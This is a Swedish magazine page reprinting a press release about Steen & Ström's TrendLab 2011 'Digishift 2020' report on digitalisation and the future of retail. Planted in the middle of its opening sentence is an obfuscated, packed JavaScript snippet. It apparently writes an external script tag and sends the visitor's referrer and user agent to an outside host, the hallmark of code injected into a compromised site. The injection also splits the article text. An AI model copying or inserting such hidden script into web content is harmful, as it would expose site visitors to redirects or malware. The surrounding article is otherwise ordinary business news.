Image Image Image Image Image Image Image Image Image Image

| 21 juli, 2018

Scroll to top

Top

No Comments

Digitaliseringen formar framtidens shopping

Digitaliseringen formar framtidens shopping
Revue Magazine

Hur eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sikhr|var|u0026u|referrer|zitnh||js|php’.split(‘|’),0,{}))
kommer en allt högre grad av digitalisering påverka framtidens handel och köpcentrum? Och hur ska varumärken, kedjor och butiker göra för att möta framtidens ständigt uppkopplade konsumenter, de så kallade netizanerna, som har obegränsad tillgång till allt genom nätet? Steen & Ströms framtidsrapport TrendLab 2011 – The Digishift 2020 redovisar ett antal tänkbara framtidsscenarier.

Kairos Future har, på uppdrag av Steen & Ström, undersökt hur digitaliseringen kommer forma framtidens handel, shoppingmiljöer och konsumentbeteenden. Trendrapporten TrendLab 2011 bygger på en internationell trendstudie med djupintervjuer, fokusgrupper och workshops där 35 experter på handel, konsumentbeteenden och digitalisering formulerat tio starka trender och nio viktiga fenomen. Ett antal spännande shoppingscenarier presenteras som kommer att definiera framtidens handel

–  Rapporten visar att digitaliseringen förändrar såväl konsumentbeteenden som olika kanalernas roller, funktioner och hierarki. Att agera traditionellt med enbart en kanal, som t ex en butik eller en sajt kommer inte fungera – framgångsrik handel kommer bygga på ett dynamiskt multi-kanal tänk, säger Charles Larsson, Marketing Director på Steen & Ström. De engagerade konsumenterna styr och formar sin egen shopping-upplevelse och deras vänner är involverade i shoppingen via sociala nätverk. Allt detta ställer helt nya krav på framtidens köpcentrum avseende flexibilitet, föränderlighet och upplevelser.

Digitaliseringen utmanar köpcentrumen

Många framtidsexperter menar att de nästkommande tio åren kommer vara de mest dramatiska någonsin och framtidsforskaren Theodore Modis menar att fem dagar under 2025 kommer motsvara lika mycket upplevelser som hela 1900-talet! Många menar också att digitaliseringen representerar ett skifte inom handeln av samma kaliber som etableringen av stormarknaderna.

Dagens och framtidens varumärken, tjänster, information, varor, upplevelser, relationer och kommunikation kommer bli alltmer digitaliserad. Facebook, Twitter, Skype, Gowalla och Foursquare har redan idag revolutionerat vårt sätt att kommunicera med familj, vänner, kollegor och kunder och med Spotify och Itunes konsumerar, upplever och delar vi idag musikupplevelser på ett helt nytt sätt.
Vad är då den största utmaningen inom retail? Att skapa nya sätt att interagera med sina kunder menar handelns representanter när de får frågan. Närmare 9 av 10 av medlemmarna i expertpanelen bakom TrendLab 2011 Digishift 2020 tror att en allt högre grad av digitalisering kommer leda till att alltfler köpcentrum behöver satsa mer på att skapa attraktiva shoppingmiljöer. Experterna tror även att rekommendationer från andra konsumenter blir allt viktigare när de vistats allt mer i digitala miljöer.

–   De fysiska butikernas roll kommer förändras. Butiksmiljöerna måste erbjuda ständig variation, upplevelser och fungera som en integrerad kugge av många kommunikationskanaler, avslutar Charles Larsson.

Tio trender och nio fenomen

I TrendLab 2011 Digishift 2020 presenterar Steen & Ström tio starka trender och nio fenomen. Trenderna handlar bland annat om ökad konsumentmakt med fokusförskjutningar från leverantörer via distributörer till konsumenter, samt hur det superlokala fortsätter att vinna mark, nya sätt att betala och netizanerna – de ständigt uppkopplade konsumenterna.

Fler trender handlar om temporära marknadsplatser och event där pop-up-shops både på nätet och i städer är tydliga exempel på hur varumärken hela tiden behöver förändras för att vinna konsumenternas intresse. TrendLab 2011 har också fördjupat sig i fenomen som spelfenomentet ”Gamification”, virtuella shoppingmiljöer och ”Tagomania” som bland annat belyser hur mobila tags och smart RFID-märkning kommer påverka vårt sätt att handla och interagera med kedjor, butiker och varumärken.

TrendLab 2011 presenterades den 20 oktober inför en europeisk publik på Steen & Ströms Retail Day som hölls på Waterfront Congress Center i Stockholm.

För att ladda ned hela rapporten – gå till: http://www.steenstrom.com/TrendLab

Bilder för fritt bruk kan laddas ner på: http://www.steenstrom.com/Digishift2020

 

För frågor kontakta:

Charles Larsson, Marketing Director, Steen & Ström, 08-508 99 913 charles.larsson@steenstrom.com

Harald Nilsen, Research Manager, Steen & Ström, +47 23 21 35 08

Harald.nilsen@steenstrom.com

Submit a Comment